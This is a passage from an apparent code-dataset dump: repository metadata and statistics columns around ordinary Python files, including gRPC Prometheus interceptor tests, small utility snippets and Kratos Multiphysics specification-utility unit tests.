| 11.3 | 26 | 0.654867 | 14 | 113 | 5.285714 | 0.571429 | 0.324324 | 0.297297 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.238938 | 113 | 9 | 27 | 12.555556 | 0.860465 | 0.106195 | 0 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 0 | 1 | 0.5 | false | 0.5 | 0 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
ccc9a92bbd684ac4e87d840a72f86dbf61ebf7dc | 3,173 | py | Python | tests/py_grpc_prometheus/test_grpc_server_interceptor_exception.py | RyanSiu1995/py-grpc-prometheus | eb9dee1f0a4e57cef220193ee48021dc9a9f3d82 | [
"Apache-2.0"
] | 40 | 2018-12-05T15:35:52.000Z | 2022-01-31T09:02:12.000Z | tests/py_grpc_prometheus/test_grpc_server_interceptor_exception.py | RyanSiu1995/py-grpc-prometheus | eb9dee1f0a4e57cef220193ee48021dc9a9f3d82 | [
"Apache-2.0"
] | 12 | 2019-08-06T12:14:20.000Z | 2021-08-09T14:53:37.000Z | tests/py_grpc_prometheus/test_grpc_server_interceptor_exception.py | RyanSiu1995/py-grpc-prometheus | eb9dee1f0a4e57cef220193ee48021dc9a9f3d82 | [
"Apache-2.0"
] | 9 | 2019-12-18T08:49:37.000Z | 2022-03-30T17:08:15.000Z | from unittest.mock import patch
import pytest
import grpc
from tests.py_grpc_prometheus.utils import get_server_metric
from tests.integration.hello_world import hello_world_pb2
@pytest.mark.parametrize("target_count", [1, 10, 100])
def test_grpc_server_handled_with_server_error(
target_count, grpc_server, grpc_stub
): # pylint: disable=unused-argument
for _ in range(target_count):
with pytest.raises(grpc.RpcError):
grpc_stub.SayHello(hello_world_pb2.HelloRequest(name="unknownError"))
target_metric = get_server_metric("grpc_server_handled")
assert target_metric.samples == []
@pytest.mark.parametrize("target_count", [1, 10, 100])
def test_grpc_server_handled_with_rpc_error(
target_count, grpc_server, grpc_stub
): # pylint: disable=unused-argument
for _ in range(target_count):
with pytest.raises(grpc.RpcError):
grpc_stub.SayHello(hello_world_pb2.HelloRequest(name="rpcError"))
target_metric = get_server_metric("grpc_server_handled")
assert target_metric.samples[0].value == target_count
@pytest.mark.parametrize("target_count", [1, 10, 100])
def test_grpc_server_handled_with_interceptor_error(
target_count, grpc_server, grpc_stub
): # pylint: disable=unused-argument
for _ in range(target_count):
with patch(
'py_grpc_prometheus.prometheus_server_interceptor.'\
'PromServerInterceptor._compute_status_code',
side_effect=Exception('mocked error')
):
with pytest.raises(grpc.RpcError):
grpc_stub.SayHello(hello_world_pb2.HelloRequest(name="unary"))
@pytest.mark.parametrize("target_count", [1, 10, 100])
def test_grpc_server_handled_with_server_error_and_skip_exceptions(
target_count, grpc_server_with_exception_handling, grpc_stub
): # pylint: disable=unused-argument
for _ in range(target_count):
with pytest.raises(grpc.RpcError):
grpc_stub.SayHello(hello_world_pb2.HelloRequest(name="unknownError"))
target_metric = get_server_metric("grpc_server_handled")
assert target_metric.samples == []
@pytest.mark.parametrize("target_count", [1, 10, 100])
def test_grpc_server_handled_with_interceptor_error_and_skip_exceptions(
target_count, grpc_server_with_exception_handling, grpc_stub
): # pylint: disable=unused-argument
for _ in range(target_count):
with patch(
'py_grpc_prometheus.prometheus_server_interceptor.'\
'PromServerInterceptor._compute_status_code',
side_effect=Exception('mocked error')
):
assert grpc_stub.SayHello(
hello_world_pb2.HelloRequest(name="unary")
).message == "Hello, unary!"
target_metric = get_server_metric("grpc_server_handled")
assert target_metric.samples == []
@pytest.mark.parametrize("target_count", [1, 10, 100])
def test_grpc_server_handled_before_request_error(
target_count, grpc_server, grpc_stub
): # pylint: disable=unused-argument
for _ in range(target_count):
with patch(
'py_grpc_prometheus.grpc_utils.wrap_iterator_inc_counter',
side_effect=Exception('mocked error')
):
assert grpc_stub.SayHello(
hello_world_pb2.HelloRequest(name="unary")
).message == "Hello, unary!"
| 37.77381 | 75 | 0.759534 | 410 | 3,173 | 5.495122 | 0.170732 | 0.092765 | 0.075455 | 0.071904 | 0.901909 | 0.901909 | 0.901909 | 0.901909 | 0.901909 | 0.899689 | 0 | 0.016088 | 0.13804 | 3,173 | 83 | 76 | 38.228916 | 0.807678 | 0.060195 | 0 | 0.788732 | 0 | 0 | 0.16605 | 0.079664 | 0 | 0 | 0 | 0 | 0.084507 | 1 | 0.084507 | false | 0 | 0.070423 | 0 | 0.15493 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
aeba132299521096b7a1ff9bcfe31d464b8ac4b4 | 143 | py | Python | Python/Algorithm/NoClass.py | piovezan/SOpt | a5ec90796b7bdf98f0675457fc4bb99c8695bc40 | [
"MIT"
] | 148 | 2017-08-03T01:49:27.000Z | 2022-03-26T10:39:30.000Z | Python/Algorithm/NoClass.py | piovezan/SOpt | a5ec90796b7bdf98f0675457fc4bb99c8695bc40 | [
"MIT"
] | 3 | 2017-11-23T19:52:05.000Z | 2020-04-01T00:44:40.000Z | Python/Algorithm/NoClass.py | piovezan/SOpt | a5ec90796b7bdf98f0675457fc4bb99c8695bc40 | [
"MIT"
] | 59 | 2017-08-03T01:49:19.000Z | 2022-03-31T23:24:38.000Z | def somar(n1, n2):
return n1 + n2
def subtrair(n1, n2):
return n1 - n2
print(somar(5, 4))
#https://pt.stackoverflow.com/q/364546/101
| 15.888889 | 42 | 0.643357 | 25 | 143 | 3.68 | 0.64 | 0.173913 | 0.217391 | 0.26087 | 0.304348 | 0 | 0 | 0 | 0 | 0 | 0 | 0.163793 | 0.188811 | 143 | 8 | 43 | 17.875 | 0.62931 | 0.286713 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0 | 0 | 0.4 | 0.8 | 0.2 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
aef724a5d903609096782dc25d64db9f55683254 | 792 | py | Python | Thesis - Autonomous Car Chasing/RC_Version/test3.py | JahodaPaul/FIT_CTU | 2d96f18c7787ddfe340a15a36da6eea910225461 | [
"MIT"
] | 17 | 2019-03-09T17:13:40.000Z | 2022-03-05T14:42:05.000Z | Swayatta - Autonomous Car Follower System/Swayatta - RC Version/Test Code 3.py | VEDANTGHODKE/Swayatta---Autonomous-Driver-Assistance-System-ADAS-For-Indian-Environments | 7f0361c0f52e4e7623d975725497648cf582f36f | [
"MIT"
] | 1 | 2018-06-23T15:57:32.000Z | 2018-06-23T15:57:32.000Z | Swayatta - Autonomous Car Follower System/Swayatta - RC Version/Test Code 3.py | VEDANTGHODKE/Swayatta---Autonomous-Driver-Assistance-System-ADAS-For-Indian-Environments | 7f0361c0f52e4e7623d975725497648cf582f36f | [
"MIT"
] | 16 | 2019-04-09T00:10:55.000Z | 2022-02-21T20:28:05.000Z | from DrivingControl import DrivingControl
dr = DrivingControl(1.5)
print(dr.PredictSteerAndThrottle(1,0))
print(dr.PredictSteerAndThrottle(2,0))
print(dr.PredictSteerAndThrottle(2.5,0))
print(dr.PredictSteerAndThrottle(3,0))
print(dr.PredictSteerAndThrottle(3,0))
print(dr.PredictSteerAndThrottle(3,0))
print(dr.PredictSteerAndThrottle(2.5,0))
print(dr.PredictSteerAndThrottle(2.25,0))
print(dr.PredictSteerAndThrottle(2,0))
print(dr.PredictSteerAndThrottle(2,0))
print(dr.PredictSteerAndThrottle(1.8,0))
print(dr.PredictSteerAndThrottle(1.5,0))
print(dr.PredictSteerAndThrottle(1.5,0))
print(dr.PredictSteerAndThrottle(2.5,0))
print(dr.PredictSteerAndThrottle(3.5,0))
print(dr.PredictSteerAndThrottle(4.5,0))
print(dr.PredictSteerAndThrottle(5.5,0))
print(dr.PredictSteerAndThrottle(5,0))
| 34.434783 | 41 | 0.811869 | 108 | 792 | 5.953704 | 0.12963 | 0.195956 | 0.839813 | 0.819596 | 0.856921 | 0.805599 | 0.7014 | 0.7014 | 0.7014 | 0.653188 | 0 | 0.064052 | 0.034091 | 792 | 22 | 42 | 36 | 0.776471 | 0 | 0 | 0.55 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.05 | 0 | 0.05 | 0.9 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 9 |
9dd1d6d8cfbc570f115c106daa76368cc8259865 | 147 | py | Python | toornament/converter.py | niborus/toornament.py | e4267746ec1274e8158a10fc4f6357ae0928b03b | [
"MIT"
] | 1 | 2021-04-22T00:06:54.000Z | 2021-04-22T00:06:54.000Z | toornament/converter.py | niborus/toornament | e4267746ec1274e8158a10fc4f6357ae0928b03b | [
"MIT"
] | null | null | null | toornament/converter.py | niborus/toornament | e4267746ec1274e8158a10fc4f6357ae0928b03b | [
"MIT"
] | null | null | null | class Converter:
@staticmethod
def datetime(string):
return string
@staticmethod
def date(string):
return string
| 14.7 | 25 | 0.62585 | 14 | 147 | 6.571429 | 0.571429 | 0.326087 | 0.391304 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.312925 | 147 | 9 | 26 | 16.333333 | 0.910891 | 0 | 0 | 0.571429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.285714 | false | 0 | 0 | 0.285714 | 0.714286 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
ae61d3df5a1f7b03537c0a89f6364f470a04d0e8 | 594 | py | Python | seg_utils/__init__.py | QUAPNH/NucDetSeg | ad4040a359e52c611780b409f84b601bfa9c94e2 | [
"Apache-2.0"
] | 1 | 2022-02-21T11:05:09.000Z | 2022-02-21T11:05:09.000Z | seg_utils/__init__.py | lh0515/cas-dc-template | 5b0400ca5dc98d09beca36d46cc55bfabb9ce4e0 | [
"Apache-2.0"
] | null | null | null | seg_utils/__init__.py | lh0515/cas-dc-template | 5b0400ca5dc98d09beca36d46cc55bfabb9ce4e0 | [
"Apache-2.0"
] | 1 | 2022-02-21T11:05:01.000Z | 2022-02-21T11:05:01.000Z | from .seg_dataset_kaggle import NucleiCell
from .seg_transforms import (Compose, ConvertImgFloat, RandomContrast, RandomBrightness, SwapChannels,
RandomLightingNoise, PhotometricDistort, Expand, RandomSampleCrop,
RandomMirror_w, RandomMirror_h, Resize, ToTensor)
__all__ = [NucleiCell, Compose, ConvertImgFloat, RandomContrast, RandomBrightness, SwapChannels,
RandomLightingNoise, PhotometricDistort, Expand, RandomSampleCrop,
RandomMirror_w, RandomMirror_h, Resize, ToTensor] | 66 | 102 | 0.688552 | 42 | 594 | 9.47619 | 0.52381 | 0.035176 | 0.180905 | 0.261307 | 0.819095 | 0.819095 | 0.819095 | 0.819095 | 0.819095 | 0.819095 | 0 | 0 | 0.257576 | 594 | 9 | 103 | 66 | 0.902494 | 0 | 0 | 0.285714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.285714 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
8880980f5eccb9da5f144d00683a2ec6e05e0367 | 20,759 | py | Python | kratos/tests/test_specifications_utilities.py | clazaro/Kratos | b947b82c90dfcbf13d60511427f85990d36b90be | [
"BSD-4-Clause"
] | null | null | null | kratos/tests/test_specifications_utilities.py | clazaro/Kratos | b947b82c90dfcbf13d60511427f85990d36b90be | [
"BSD-4-Clause"
] | null | null | null | kratos/tests/test_specifications_utilities.py | clazaro/Kratos | b947b82c90dfcbf13d60511427f85990d36b90be | [
"BSD-4-Clause"
] | null | null | null | from __future__ import print_function, absolute_import, division
# Importing the Kratos Library
import KratosMultiphysics
import KratosMultiphysics.KratosUnittest as KratosUnittest
import KratosMultiphysics.kratos_utilities as KratosUtils
dependencies_are_available = KratosUtils.CheckIfApplicationsAvailable("StructuralMechanicsApplication")
if dependencies_are_available:
import KratosMultiphysics.StructuralMechanicsApplication as StructuralMechanicsApplication
class TestSpecificationsUtilities(KratosUnittest.TestCase):
    def test_specifications_utilities_elements(self):
        """Checks AddMissingVariables, AddMissingDofs and the specification queries on elements."""
        current_model = KratosMultiphysics.Model()
        model_part = current_model.CreateModelPart("Main")
node1 = model_part.CreateNewNode(1, 0.0,0.0,0.0)
node2 = model_part.CreateNewNode(2, 1.0,0.0,0.0)
node3 = model_part.CreateNewNode(3, 1.0,1.0,0.0)
prop1 = KratosMultiphysics.Properties(1)
model_part.AddProperties(prop1)
elem1 = model_part.CreateNewElement("Element2D3N", 1, [1,2,3], model_part.GetProperties()[1])
elem1.Initialize(model_part.ProcessInfo)
self.assertEqual(model_part.GetNodalSolutionStepDataSize(), 0)
KratosMultiphysics.SpecificationsUtilities.AddMissingVariables(model_part)
self.assertEqual(model_part.GetNodalSolutionStepDataSize(), 0)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_X), False)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Y), False)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Z), False)
KratosMultiphysics.SpecificationsUtilities.AddMissingDofs(model_part)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_X), False)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Y), False)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Z), False)
self.assertEqual(KratosMultiphysics.SpecificationsUtilities.DetermineTimeIntegration(model_part), [])
self.assertEqual(KratosMultiphysics.SpecificationsUtilities.DetermineFramework(model_part), "lagrangian")
self.assertEqual(KratosMultiphysics.SpecificationsUtilities.DetermineSymmetricLHS(model_part), True)
self.assertEqual(KratosMultiphysics.SpecificationsUtilities.DeterminePositiveDefiniteLHS(model_part), True)
self.assertEqual(KratosMultiphysics.SpecificationsUtilities.DetermineIfCompatibleGeometries(model_part), True)
self.assertEqual(KratosMultiphysics.SpecificationsUtilities.DetermineIfRequiresTimeIntegration(model_part), True)
self.assertEqual(KratosMultiphysics.SpecificationsUtilities.CheckCompatibleConstitutiveLaws(model_part), True)
self.assertEqual(KratosMultiphysics.SpecificationsUtilities.CheckGeometricalPolynomialDegree(model_part), -1)
docu = KratosMultiphysics.Parameters("""{"Element2D3N" : "This is a pure geometric element, no computation"}""")
self.assertEqual(KratosMultiphysics.SpecificationsUtilities.GetDocumention(model_part).IsEquivalentTo(docu), True)
    def test_specifications_utilities_elements_list(self):
        """Checks AddMissingVariablesFromEntitiesList and AddMissingDofsFromEntitiesList on elements."""
        current_model = KratosMultiphysics.Model()
        model_part = current_model.CreateModelPart("Main")
node1 = model_part.CreateNewNode(1, 0.0,0.0,0.0)
node2 = model_part.CreateNewNode(2, 1.0,0.0,0.0)
node3 = model_part.CreateNewNode(3, 1.0,1.0,0.0)
prop1 = KratosMultiphysics.Properties(1)
model_part.AddProperties(prop1)
elem1 = model_part.CreateNewElement("Element2D3N", 1, [1,2,3], model_part.GetProperties()[1])
elem1.Initialize(model_part.ProcessInfo)
list_entities = KratosMultiphysics.Parameters("""{
"element_list" : ["Element2D3N"]
}""")
self.assertEqual(model_part.GetNodalSolutionStepDataSize(), 0)
KratosMultiphysics.SpecificationsUtilities.AddMissingVariablesFromEntitiesList(model_part, list_entities)
self.assertEqual(model_part.GetNodalSolutionStepDataSize(), 0)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_X), False)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Y), False)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Z), False)
KratosMultiphysics.SpecificationsUtilities.AddMissingDofsFromEntitiesList(model_part, list_entities)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_X), False)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Y), False)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Z), False)
    def test_specifications_utilities_conditions(self):
        """Checks AddMissingVariables, AddMissingDofs and the specification queries on conditions."""
        current_model = KratosMultiphysics.Model()
        model_part = current_model.CreateModelPart("Main")
node1 = model_part.CreateNewNode(1, 0.0,0.0,0.0)
node2 = model_part.CreateNewNode(2, 1.0,0.0,0.0)
node3 = model_part.CreateNewNode(3, 1.0,1.0,0.0)
prop1 = KratosMultiphysics.Properties(1)
model_part.AddProperties(prop1)
cond1 = model_part.CreateNewCondition("SurfaceCondition3D3N", 1, [1,2,3], model_part.GetProperties()[1])
cond1.Initialize(model_part.ProcessInfo)
self.assertEqual(model_part.GetNodalSolutionStepDataSize(), 0)
KratosMultiphysics.SpecificationsUtilities.AddMissingVariables(model_part)
self.assertEqual(model_part.GetNodalSolutionStepDataSize(), 0)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_X), False)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Y), False)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Z), False)
KratosMultiphysics.SpecificationsUtilities.AddMissingDofs(model_part)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_X), False)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Y), False)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Z), False)
self.assertEqual(KratosMultiphysics.SpecificationsUtilities.DetermineTimeIntegration(model_part), [])
self.assertEqual(KratosMultiphysics.SpecificationsUtilities.DetermineFramework(model_part), "lagrangian")
self.assertEqual(KratosMultiphysics.SpecificationsUtilities.DetermineSymmetricLHS(model_part), True)
self.assertEqual(KratosMultiphysics.SpecificationsUtilities.DeterminePositiveDefiniteLHS(model_part), True)
self.assertEqual(KratosMultiphysics.SpecificationsUtilities.DetermineIfCompatibleGeometries(model_part), True)
self.assertEqual(KratosMultiphysics.SpecificationsUtilities.DetermineIfRequiresTimeIntegration(model_part), True)
self.assertEqual(KratosMultiphysics.SpecificationsUtilities.CheckCompatibleConstitutiveLaws(model_part), True)
self.assertEqual(KratosMultiphysics.SpecificationsUtilities.CheckGeometricalPolynomialDegree(model_part), -1)
docu = KratosMultiphysics.Parameters("""{"SurfaceCondition3D3N" : "This is a pure geometric condition, no computation"}""")
self.assertEqual(KratosMultiphysics.SpecificationsUtilities.GetDocumention(model_part).IsEquivalentTo(docu), True)
    def test_specifications_utilities_conditions_list(self):
        current_model = KratosMultiphysics.Model()
        model_part = current_model.CreateModelPart("Main")
        node1 = model_part.CreateNewNode(1, 0.0, 0.0, 0.0)
        node2 = model_part.CreateNewNode(2, 1.0, 0.0, 0.0)
        node3 = model_part.CreateNewNode(3, 1.0, 1.0, 0.0)
        prop1 = KratosMultiphysics.Properties(1)
        model_part.AddProperties(prop1)
        cond1 = model_part.CreateNewCondition("SurfaceCondition3D3N", 1, [1, 2, 3], model_part.GetProperties()[1])
        cond1.Initialize(model_part.ProcessInfo)

        list_entities = KratosMultiphysics.Parameters("""{
            "condition_list" : ["SurfaceCondition3D3N"]
        }""")

        self.assertEqual(model_part.GetNodalSolutionStepDataSize(), 0)
        KratosMultiphysics.SpecificationsUtilities.AddMissingVariablesFromEntitiesList(model_part, list_entities)
        self.assertEqual(model_part.GetNodalSolutionStepDataSize(), 0)

        self.assertFalse(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_X))
        self.assertFalse(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Y))
        self.assertFalse(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Z))
        KratosMultiphysics.SpecificationsUtilities.AddMissingDofsFromEntitiesList(model_part, list_entities)
        self.assertFalse(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_X))
        self.assertFalse(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Y))
        self.assertFalse(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Z))

    @KratosUnittest.skipUnless(dependencies_are_available, "StructuralMechanicsApplication is not available")
    def test_specifications_utilities_elements_dependencies(self):
        current_model = KratosMultiphysics.Model()
        model_part = current_model.CreateModelPart("Main")
        node1 = model_part.CreateNewNode(1, 0.0, 0.0, 0.0)
        node2 = model_part.CreateNewNode(2, 1.0, 0.0, 0.0)
        node3 = model_part.CreateNewNode(3, 1.0, 1.0, 0.0)
        prop1 = KratosMultiphysics.Properties(1)
        model_part.AddProperties(prop1)
        prop1.SetValue(KratosMultiphysics.CONSTITUTIVE_LAW, StructuralMechanicsApplication.LinearElasticPlaneStrain2DLaw())
        elem1 = model_part.CreateNewElement("SmallDisplacementElement2D3N", 1, [1, 2, 3], model_part.GetProperties()[1])
        elem1.Initialize(model_part.ProcessInfo)

        self.assertEqual(model_part.GetNodalSolutionStepDataSize(), 0)
        KratosMultiphysics.SpecificationsUtilities.AddMissingVariables(model_part)
        self.assertEqual(model_part.GetNodalSolutionStepDataSize(), 3)

        self.assertFalse(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_X))
        self.assertFalse(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Y))
        self.assertFalse(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Z))
        KratosMultiphysics.SpecificationsUtilities.AddMissingDofs(model_part)
        self.assertTrue(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_X))
        self.assertTrue(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Y))
        self.assertFalse(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Z))

        # Note: list.sort() returns None, so comparing the results of two
        # sort() calls always passes. Compare sorted copies instead.
        self.assertEqual(sorted(KratosMultiphysics.SpecificationsUtilities.DetermineTimeIntegration(model_part)), sorted(["explicit", "static", "implicit"]))
        self.assertEqual(KratosMultiphysics.SpecificationsUtilities.DetermineFramework(model_part), "lagrangian")
        self.assertTrue(KratosMultiphysics.SpecificationsUtilities.DetermineSymmetricLHS(model_part))
        self.assertTrue(KratosMultiphysics.SpecificationsUtilities.DeterminePositiveDefiniteLHS(model_part))
        self.assertTrue(KratosMultiphysics.SpecificationsUtilities.DetermineIfCompatibleGeometries(model_part))
        self.assertTrue(KratosMultiphysics.SpecificationsUtilities.DetermineIfRequiresTimeIntegration(model_part))
        self.assertTrue(KratosMultiphysics.SpecificationsUtilities.CheckCompatibleConstitutiveLaws(model_part))
        self.assertEqual(KratosMultiphysics.SpecificationsUtilities.CheckGeometricalPolynomialDegree(model_part), -1)

        docu = KratosMultiphysics.Parameters("""{"SmallDisplacementElement2D3N" : "This is a pure displacement element"}""")
        self.assertTrue(KratosMultiphysics.SpecificationsUtilities.GetDocumention(model_part).IsEquivalentTo(docu))

        # Changing the law to get a False check
        prop1.SetValue(KratosMultiphysics.CONSTITUTIVE_LAW, StructuralMechanicsApplication.LinearElasticPlaneStress2DLaw())
        elem1.Initialize(model_part.ProcessInfo)
        self.assertFalse(KratosMultiphysics.SpecificationsUtilities.CheckCompatibleConstitutiveLaws(model_part))

    def test_specifications_utilities_elements_core_dependencies_list(self):
        current_model = KratosMultiphysics.Model()
        model_part = current_model.CreateModelPart("Main")
        node1 = model_part.CreateNewNode(1, 0.0, 0.0, 0.0)
        node2 = model_part.CreateNewNode(2, 1.0, 0.0, 0.0)
        node3 = model_part.CreateNewNode(3, 1.0, 1.0, 0.0)
        prop1 = KratosMultiphysics.Properties(1)
        model_part.AddProperties(prop1)
        elem1 = model_part.CreateNewElement("DistanceCalculationElementSimplex2D3N", 1, [1, 2, 3], model_part.GetProperties()[1])
        elem1.Initialize(model_part.ProcessInfo)

        list_entities = KratosMultiphysics.Parameters("""{
            "element_list" : ["DistanceCalculationElementSimplex2D3N"]
        }""")

        self.assertEqual(model_part.GetNodalSolutionStepDataSize(), 0)
        KratosMultiphysics.SpecificationsUtilities.AddMissingVariablesFromEntitiesList(model_part, list_entities)
        self.assertEqual(model_part.GetNodalSolutionStepDataSize(), 1)

        self.assertFalse(node1.HasDofFor(KratosMultiphysics.DISTANCE))
        KratosMultiphysics.SpecificationsUtilities.AddMissingDofsFromEntitiesList(model_part, list_entities)
        self.assertTrue(node1.HasDofFor(KratosMultiphysics.DISTANCE))

    @KratosUnittest.skipUnless(dependencies_are_available, "StructuralMechanicsApplication is not available")
    def test_specifications_utilities_elements_dependencies_list(self):
        current_model = KratosMultiphysics.Model()
        model_part = current_model.CreateModelPart("Main")
        node1 = model_part.CreateNewNode(1, 0.0, 0.0, 0.0)
        node2 = model_part.CreateNewNode(2, 1.0, 0.0, 0.0)
        node3 = model_part.CreateNewNode(3, 1.0, 1.0, 0.0)
        prop1 = KratosMultiphysics.Properties(1)
        model_part.AddProperties(prop1)
        prop1.SetValue(KratosMultiphysics.CONSTITUTIVE_LAW, StructuralMechanicsApplication.LinearElasticPlaneStrain2DLaw())
        elem1 = model_part.CreateNewElement("SmallDisplacementElement2D3N", 1, [1, 2, 3], model_part.GetProperties()[1])
        elem1.Initialize(model_part.ProcessInfo)

        list_entities = KratosMultiphysics.Parameters("""{
            "element_list" : ["SmallDisplacementElement2D3N"]
        }""")

        self.assertEqual(model_part.GetNodalSolutionStepDataSize(), 0)
        KratosMultiphysics.SpecificationsUtilities.AddMissingVariablesFromEntitiesList(model_part, list_entities)
        self.assertEqual(model_part.GetNodalSolutionStepDataSize(), 3)

        self.assertFalse(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_X))
        self.assertFalse(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Y))
        self.assertFalse(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Z))
        KratosMultiphysics.SpecificationsUtilities.AddMissingDofsFromEntitiesList(model_part, list_entities)
        self.assertTrue(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_X))
        self.assertTrue(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Y))
        self.assertFalse(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Z))

    @KratosUnittest.skipUnless(dependencies_are_available, "StructuralMechanicsApplication is not available")
    def test_specifications_utilities_conditions_dependencies(self):
        current_model = KratosMultiphysics.Model()
        model_part = current_model.CreateModelPart("Main")
        node1 = model_part.CreateNewNode(1, 0.0, 0.0, 0.0)
        node2 = model_part.CreateNewNode(2, 1.0, 0.0, 0.0)
        node3 = model_part.CreateNewNode(3, 1.0, 1.0, 0.0)
        prop1 = KratosMultiphysics.Properties(1)
        model_part.AddProperties(prop1)
        cond1 = model_part.CreateNewCondition("SurfaceLoadCondition3D3N", 1, [1, 2, 3], model_part.GetProperties()[1])
        cond1.Initialize(model_part.ProcessInfo)

        self.assertEqual(model_part.GetNodalSolutionStepDataSize(), 0)
        KratosMultiphysics.SpecificationsUtilities.AddMissingVariables(model_part)
        self.assertEqual(model_part.GetNodalSolutionStepDataSize(), 3)

        self.assertFalse(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_X))
        self.assertFalse(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Y))
        self.assertFalse(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Z))
        KratosMultiphysics.SpecificationsUtilities.AddMissingDofs(model_part)
        self.assertTrue(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_X))
        self.assertTrue(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Y))
        self.assertTrue(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Z))

        # Note: list.sort() returns None, so comparing the results of two
        # sort() calls always passes. Compare sorted copies instead.
        self.assertEqual(sorted(KratosMultiphysics.SpecificationsUtilities.DetermineTimeIntegration(model_part)), sorted(["explicit", "static", "implicit"]))
        self.assertEqual(KratosMultiphysics.SpecificationsUtilities.DetermineFramework(model_part), "lagrangian")
        self.assertTrue(KratosMultiphysics.SpecificationsUtilities.DetermineSymmetricLHS(model_part))
        self.assertTrue(KratosMultiphysics.SpecificationsUtilities.DeterminePositiveDefiniteLHS(model_part))
        self.assertTrue(KratosMultiphysics.SpecificationsUtilities.DetermineIfCompatibleGeometries(model_part))
        self.assertTrue(KratosMultiphysics.SpecificationsUtilities.DetermineIfRequiresTimeIntegration(model_part))
        self.assertTrue(KratosMultiphysics.SpecificationsUtilities.CheckCompatibleConstitutiveLaws(model_part))
